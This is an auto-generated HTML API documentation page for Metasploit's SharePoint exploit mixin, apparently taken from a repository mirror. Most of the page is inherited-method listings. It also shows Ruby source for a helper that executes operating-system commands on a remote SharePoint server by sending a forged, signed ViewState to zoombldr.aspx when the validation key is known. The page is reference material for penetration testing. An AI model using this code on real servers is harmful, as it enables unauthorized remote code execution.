adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/HTTP/Sharepoint.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

666 lines
41 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HTTP::Sharepoint
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HTTP::Sharepoint";
relpath = '../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../_index.html">Index (S)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../HTTP.html" title="Msf::Exploit::Remote::HTTP (module)">HTTP</a></span></span>
&raquo;
<span class="title">Sharepoint</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HTTP::Sharepoint
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">Msf::Exploit::Remote::HttpClient</a></span>, <span class='object_link'><a href="../../ViewState.html" title="Msf::Exploit::ViewState (module)">ViewState</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http/sharepoint.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module provides a way of interacting with sharepoint installations</p>
</div>
</div>
<div class="tags">
</div>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">Msf::Exploit::Remote::HttpClient</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../HttpClient.html#client-instance_method" title="Msf::Exploit::Remote::HttpClient#client (method)">#client</a></span>, <span class='object_link'><a href="../HttpClient.html#cookie_jar-instance_method" title="Msf::Exploit::Remote::HttpClient#cookie_jar (method)">#cookie_jar</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#sharepoint_execute_command_via_viewstate-instance_method" title="#sharepoint_execute_command_via_viewstate (instance method)">#<strong>sharepoint_execute_command_via_viewstate</strong>(cmd, validation_key, http_request_opts = {}) &#x21d2; nil </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Execute an operating system command by crafting and sending a viewstate to the remote server.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#sharepoint_get_site_web_id-instance_method" title="#sharepoint_get_site_web_id (instance method)">#<strong>sharepoint_get_site_web_id</strong>(http_request_opts = {}) &#x21d2; String<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Get the sites webID.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#sharepoint_get_version-instance_method" title="#sharepoint_get_version (instance method)">#<strong>sharepoint_get_version</strong>(http_request_opts = {}) &#x21d2; Rex::Version<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Get the SharePoint version number.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../ViewState.html" title="Msf::Exploit::ViewState (module)">ViewState</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../ViewState.html#can_sign_viewstate%3F-instance_method" title="Msf::Exploit::ViewState#can_sign_viewstate? (method)">#can_sign_viewstate?</a></span>, <span class='object_link'><a href="../../ViewState.html#decode_viewstate-instance_method" title="Msf::Exploit::ViewState#decode_viewstate (method)">#decode_viewstate</a></span>, <span class='object_link'><a href="../../ViewState.html#extract_viewstate-instance_method" title="Msf::Exploit::ViewState#extract_viewstate (method)">#extract_viewstate</a></span>, <span class='object_link'><a href="../../ViewState.html#extract_viewstate_generator-instance_method" title="Msf::Exploit::ViewState#extract_viewstate_generator (method)">#extract_viewstate_generator</a></span>, <span class='object_link'><a href="../../ViewState.html#extract_viewstate_validation_key-instance_method" title="Msf::Exploit::ViewState#extract_viewstate_validation_key (method)">#extract_viewstate_validation_key</a></span>, <span class='object_link'><a href="../../ViewState.html#generate_viewstate-instance_method" title="Msf::Exploit::ViewState#generate_viewstate (method)">#generate_viewstate</a></span>, <span class='object_link'><a href="../../ViewState.html#generate_viewstate_hmac-instance_method" title="Msf::Exploit::ViewState#generate_viewstate_hmac (method)">#generate_viewstate_hmac</a></span>, <span class='object_link'><a href="../../ViewState.html#generate_viewstate_payload-instance_method" title="Msf::Exploit::ViewState#generate_viewstate_payload (method)">#generate_viewstate_payload</a></span>, <span class='object_link'><a href="../../ViewState.html#initialize-instance_method" title="Msf::Exploit::ViewState#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../../ViewState.html#pack_viewstate_generator-instance_method" title="Msf::Exploit::ViewState#pack_viewstate_generator (method)">#pack_viewstate_generator</a></span>, <span class='object_link'><a href="../../ViewState.html#pack_viewstate_validation_key-instance_method" title="Msf::Exploit::ViewState#pack_viewstate_validation_key (method)">#pack_viewstate_validation_key</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">Msf::Exploit::Remote::HttpClient</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../HttpClient.html#basic_auth-instance_method" title="Msf::Exploit::Remote::HttpClient#basic_auth (method)">#basic_auth</a></span>, <span class='object_link'><a href="../HttpClient.html#cleanup-instance_method" title="Msf::Exploit::Remote::HttpClient#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../HttpClient.html#configure_http_login_scanner-instance_method" title="Msf::Exploit::Remote::HttpClient#configure_http_login_scanner (method)">#configure_http_login_scanner</a></span>, <span class='object_link'><a href="../HttpClient.html#connect-instance_method" title="Msf::Exploit::Remote::HttpClient#connect (method)">#connect</a></span>, <span class='object_link'><a href="../HttpClient.html#connect_ws-instance_method" title="Msf::Exploit::Remote::HttpClient#connect_ws (method)">#connect_ws</a></span>, <span class='object_link'><a href="../HttpClient.html#deregister_http_client_options-instance_method" title="Msf::Exploit::Remote::HttpClient#deregister_http_client_options (method)">#deregister_http_client_options</a></span>, <span class='object_link'><a href="../HttpClient.html#disconnect-instance_method" title="Msf::Exploit::Remote::HttpClient#disconnect (method)">#disconnect</a></span>, <span class='object_link'><a href="../HttpClient.html#download-instance_method" title="Msf::Exploit::Remote::HttpClient#download (method)">#download</a></span>, <span class='object_link'><a href="../HttpClient.html#full_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#full_uri (method)">#full_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#handler-instance_method" title="Msf::Exploit::Remote::HttpClient#handler (method)">#handler</a></span>, <span class='object_link'><a href="../HttpClient.html#http_fingerprint-instance_method" title="Msf::Exploit::Remote::HttpClient#http_fingerprint (method)">#http_fingerprint</a></span>, <span class='object_link'><a href="../HttpClient.html#initialize-instance_method" title="Msf::Exploit::Remote::HttpClient#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../HttpClient.html#lookup_http_fingerprints-instance_method" title="Msf::Exploit::Remote::HttpClient#lookup_http_fingerprints (method)">#lookup_http_fingerprints</a></span>, <span class='object_link'><a href="../HttpClient.html#normalize_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#normalize_uri (method)">#normalize_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#path_from_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#path_from_uri (method)">#path_from_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#peer-instance_method" title="Msf::Exploit::Remote::HttpClient#peer (method)">#peer</a></span>, <span class='object_link'><a href="../HttpClient.html#proxies-instance_method" title="Msf::Exploit::Remote::HttpClient#proxies (method)">#proxies</a></span>, <span class='object_link'><a href="../HttpClient.html#reconfig_redirect_opts!-instance_method" title="Msf::Exploit::Remote::HttpClient#reconfig_redirect_opts! (method)">#reconfig_redirect_opts!</a></span>, <span class='object_link'><a href="../HttpClient.html#request_opts_from_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_opts_from_url (method)">#request_opts_from_url</a></span>, <span class='object_link'><a href="../HttpClient.html#request_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_url (method)">#request_url</a></span>, <span class='object_link'><a href="../HttpClient.html#rhost-instance_method" title="Msf::Exploit::Remote::HttpClient#rhost (method)">#rhost</a></span>, <span class='object_link'><a href="../HttpClient.html#rport-instance_method" title="Msf::Exploit::Remote::HttpClient#rport (method)">#rport</a></span>, <span class='object_link'><a href="../HttpClient.html#send_request_cgi-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_cgi (method)">#send_request_cgi</a></span>, <span class='object_link'><a href="../HttpClient.html#send_request_cgi!-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_cgi! (method)">#send_request_cgi!</a></span>, <span class='object_link'><a href="../HttpClient.html#send_request_raw-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_raw (method)">#send_request_raw</a></span>, <span class='object_link'><a href="../HttpClient.html#service_details-instance_method" title="Msf::Exploit::Remote::HttpClient#service_details (method)">#service_details</a></span>, <span class='object_link'><a href="../HttpClient.html#setup-instance_method" title="Msf::Exploit::Remote::HttpClient#setup (method)">#setup</a></span>, <span class='object_link'><a href="../HttpClient.html#ssl-instance_method" title="Msf::Exploit::Remote::HttpClient#ssl (method)">#ssl</a></span>, <span class='object_link'><a href="../HttpClient.html#ssl_version-instance_method" title="Msf::Exploit::Remote::HttpClient#ssl_version (method)">#ssl_version</a></span>, <span class='object_link'><a href="../HttpClient.html#sslkeylogfile-instance_method" title="Msf::Exploit::Remote::HttpClient#sslkeylogfile (method)">#sslkeylogfile</a></span>, <span class='object_link'><a href="../HttpClient.html#strip_tags-instance_method" title="Msf::Exploit::Remote::HttpClient#strip_tags (method)">#strip_tags</a></span>, <span class='object_link'><a href="../HttpClient.html#target_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#target_uri (method)">#target_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#validate_fingerprint-instance_method" title="Msf::Exploit::Remote::HttpClient#validate_fingerprint (method)">#validate_fingerprint</a></span>, <span class='object_link'><a href="../HttpClient.html#vhost-instance_method" title="Msf::Exploit::Remote::HttpClient#vhost (method)">#vhost</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Kerberos/ServiceAuthenticator/Options.html" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options (module)">Kerberos::ServiceAuthenticator::Options</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Kerberos/ServiceAuthenticator/Options.html#kerberos_auth_options-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_auth_options (method)">#kerberos_auth_options</a></span>, <span class='object_link'><a href="../Kerberos/ServiceAuthenticator/Options.html#kerberos_clock_skew_seconds-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_clock_skew_seconds (method)">#kerberos_clock_skew_seconds</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Kerberos/Ticket/Storage.html" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage (module)">Kerberos::Ticket::Storage</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Kerberos/Ticket/Storage.html#initialize-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../Kerberos/Ticket/Storage.html#kerberos_storage_options-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_storage_options (method)">#kerberos_storage_options</a></span>, <span class='object_link'><a href="../Kerberos/Ticket/Storage.html#kerberos_ticket_storage-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_ticket_storage (method)">#kerberos_ticket_storage</a></span>, <span class='object_link'><a href="../Kerberos/Ticket/Storage.html#store_ccache-class_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache (method)">store_ccache</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Auxiliary/LoginScanner.html" title="Msf::Auxiliary::LoginScanner (module)">Auxiliary::LoginScanner</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Auxiliary/LoginScanner.html#configure_login_scanner-instance_method" title="Msf::Auxiliary::LoginScanner#configure_login_scanner (method)">#configure_login_scanner</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? (method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_web_form-instance_method" title="Msf::Auxiliary::Report#report_web_form (method)">#report_web_form</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_web_page-instance_method" title="Msf::Auxiliary::Report#report_web_page (method)">#report_web_page</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_web_site-instance_method" title="Msf::Auxiliary::Report#report_web_site (method)">#report_web_site</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_web_vuln-instance_method" title="Msf::Auxiliary::Report#report_web_vuln (method)">#report_web_vuln</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#store_cred-instance_method" title="Msf::Auxiliary::Report#store_cred (method)">#store_cred</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#store_local-instance_method" title="Msf::Auxiliary::Report#store_local (method)">#store_local</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#store_loot-instance_method" title="Msf::Auxiliary::Report#store_loot (method)">#store_loot</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="sharepoint_execute_command_via_viewstate-instance_method">
#<strong>sharepoint_execute_command_via_viewstate</strong>(cmd, validation_key, http_request_opts = {}) &#x21d2; <tt>nil</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Execute an operating system command by crafting and sending a viewstate to the remote server. In order for this to work, the <strong>validation_key</strong> must be known.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cmd</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The OS command to run on the remote system</p>
</div>
</li>
<li>
<span class='name'>validation_key</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The remote system's validation key from the web.config file.</p>
</div>
</li>
<li>
<span class='name'>http_request_opts</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>Options to override the defaults of the HTTP request.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>This function doesn't return anything.</p>
</div>
</li>
</ul>
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt>RuntimeError</tt>)</span>
&mdash;
<div class='inline'>
<p>This function will raise a RuntimeError via #fail_with if the command failed to execute.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 24</span>
<span class='kw'>def</span> <span class='id identifier rubyid_sharepoint_execute_command_via_viewstate'>sharepoint_execute_command_via_viewstate</span><span class='lparen'>(</span><span class='id identifier rubyid_cmd'>cmd</span><span class='comma'>,</span> <span class='id identifier rubyid_validation_key'>validation_key</span><span class='comma'>,</span> <span class='id identifier rubyid_http_request_opts'>http_request_opts</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Executing command: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_cgi'>send_request_cgi</span><span class='lparen'>(</span><span class='id identifier rubyid_http_request_opts'>http_request_opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>POST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_normalize_uri'>normalize_uri</span><span class='lparen'>(</span><span class='id identifier rubyid_target_uri'>target_uri</span><span class='period'>.</span><span class='id identifier rubyid_path'>path</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/_layouts/15/zoombldr.aspx</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>vars_post</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>__VIEWSTATE</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_generate_viewstate_payload'>generate_viewstate_payload</span><span class='lparen'>(</span>
<span class='id identifier rubyid_cmd'>cmd</span><span class='comma'>,</span>
<span class='label'>extra:</span> <span class='id identifier rubyid_pack_viewstate_generator'>pack_viewstate_generator</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>63E6434F</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span> <span class='comment'># /_layouts/15/zoombldr.aspx
</span> <span class='label'>algo:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>sha256</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>key:</span> <span class='id identifier rubyid_pack_viewstate_validation_key'>pack_viewstate_validation_key</span><span class='lparen'>(</span><span class='id identifier rubyid_validation_key'>validation_key</span><span class='rparen'>)</span>
<span class='rparen'>)</span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_res'>res</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#Unreachable-constant" title="Msf::Module::Failure::Unreachable (constant)">Unreachable</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Target did not respond to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid___method__'>__method__</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>==</span> <span class='int'>200</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#PayloadFailed-constant" title="Msf::Module::Failure::PayloadFailed (constant)">PayloadFailed</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to execute command: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_vprint_good'>vprint_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Successfully executed command</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="sharepoint_get_site_web_id-instance_method">
#<strong>sharepoint_get_site_web_id</strong>(http_request_opts = {}) &#x21d2; <tt>String</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Get the sites webID.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>http_request_opts</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>Options to override the defaults of the HTTP request.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>The webID if it was able to be recovered.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
55
56
57
58
59
60
61
62
63
64</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 55</span>
<span class='kw'>def</span> <span class='id identifier rubyid_sharepoint_get_site_web_id'>sharepoint_get_site_web_id</span><span class='lparen'>(</span><span class='id identifier rubyid_http_request_opts'>http_request_opts</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_cgi'>send_request_cgi</span><span class='lparen'>(</span><span class='id identifier rubyid_http_request_opts'>http_request_opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_normalize_uri'>normalize_uri</span><span class='lparen'>(</span><span class='id identifier rubyid_target_uri'>target_uri</span><span class='period'>.</span><span class='id identifier rubyid_path'>path</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_api</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>web</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>id</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='rbrace'>}</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>unless</span> <span class='id identifier rubyid_res'>res</span><span class='op'>&amp;.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>==</span> <span class='int'>200</span>
